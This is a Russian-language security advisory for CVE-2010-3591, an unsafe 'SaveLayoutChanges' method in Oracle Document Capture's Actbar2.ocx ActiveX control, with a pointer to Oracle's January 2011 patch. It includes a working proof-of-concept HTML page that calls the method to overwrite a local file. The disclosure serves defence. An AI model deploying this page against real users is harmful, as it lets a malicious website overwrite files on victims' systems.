CVE-2010-3591: Небезопасный метод

Oracle

Oracle Document Capture Release 10gR3

Небезопасный метод

23.03.2010

25.01.2011

http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3591

Дмитрий Евдокимов

Oracle Document Capture содержит компонент ActiveX ActiveBar2Library (Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9}, который содержит небезопасный метод «SaveLayoutChanges», способный переписать любой нескрытый файл в системе.

Class ActiveBar2
GUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9}
Number of Interfaces: 1
Default Interface: IActiveBar2
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False

Эксплойт
Злоумышленник может создать HTML-страницу, которая вызовет уязвимую функцию «SaveLayoutChanges» из компонента ActiveX Actbar2.ocx

Пример
<HTML>
<HEAD>
<TITLE>DSecRG</TITLE>
</HEAD>
<BODY>

<OBJECT id=’eds’ classid=’clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9′></OBJECT>

<SCRIPT>

function Exploit(){
eds.SaveLayoutChanges(«C:\\31337.txt»,1);
}
Exploit();

</SCRIPT>
</BODY>
</HTML>

Решение
Информация была опубликована в CPU, Январь 2011.
Клиенты могут загрузить патчи CPU, следуя инструкциям по ссылке:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html